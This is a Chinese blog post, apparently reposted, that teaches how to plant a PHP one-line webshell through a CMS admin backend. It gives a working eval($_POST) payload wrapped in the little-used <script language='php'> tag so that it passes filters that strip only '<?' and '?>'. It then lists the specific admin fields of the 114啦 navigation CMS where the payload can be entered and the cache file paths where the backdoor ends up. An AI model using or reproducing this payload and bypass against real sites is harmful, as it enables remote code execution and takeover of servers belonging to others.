首页 > 网络安全 > 脚本攻防

php后台插一句话后门的思路分享

admin 脚本攻防 2022-02-17 09:22:45 一句话后门"
首先介绍下php的各种标签:
1):
<?php ?>
demo:
<?php echo "test";?>
这个标签现在程序大多都是使用的这种标签!大家都不陌生了,这里就不多介绍了!
2):
<? echo "test"; ?>
这种标签是在以前很普遍的一种用法php 老版本开发的cms大多都是用的它,
大多程序员都是很熟悉的!我们把这种标签称为短语标签!
3):
<script language="php"> </script>
demo:
<script language="php">echo "test";</script>
这个标签是今天的重点,大多都不熟悉的!而且程序员在网站后台过滤插一句话
的时候往往都是以
“<?,?>”
这两个关键字进行替换或过滤的!所以这种标签在后台插马
的时候用处还是很大的!PS:就是应为使用量不大,就不重视!这样能行吗?
实战:114啦导航准备我们的一句话代码:利用script的标签代码:
<script language="php">eval ($_POST[1]);</script>
首先后台我跟晴天那家伙已经看完了。他自己的方法也没拿下shell模版目录权限是只读!你们懂的!
这里的方法就是利用缓存拿shell.这个方法是以前公布出来的。作者具体就不知道是谁了(转载乱了)
–官方以及把这里修补了,但是修补方法很马虎!就是我之前说的过滤关键字只有
<? ?>
所以这里我们可以利用 我们准备好的script格式的php一句话代码插入!
名站首行:
HTML内输入一句话,提交后一句话木马位于admin/data/cache/cache_mztop.php
名站轮播:
站点网址后输入一句话,提交后一句话木马位于admin/data/cache/cache_famous_loop.php
名站切换:
ifreme网址后输入一句话,提交后一句话木马位于admin/data/cache/cache_famous_tab.php
首页实用工具:
工具网址后输入一句话,提交后一句话木马位于admin/data/cache/cache_index_tool.php
本文来源于:半坑土农民'S Blog
版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
本文地址:/websafe/jbgongfang/148856.html

留言与评论(共有 0 条评论)
   
验证码:

潘少俊衡

| 桂ICP备2023010378号-4

Powered By EmpireCMS

爱享小站

中德益农

谷姐神农

环亚肥料

使用手机软件扫描微信二维码

关注我们可获取更多热点资讯

感谢潘少俊衡友情技术支持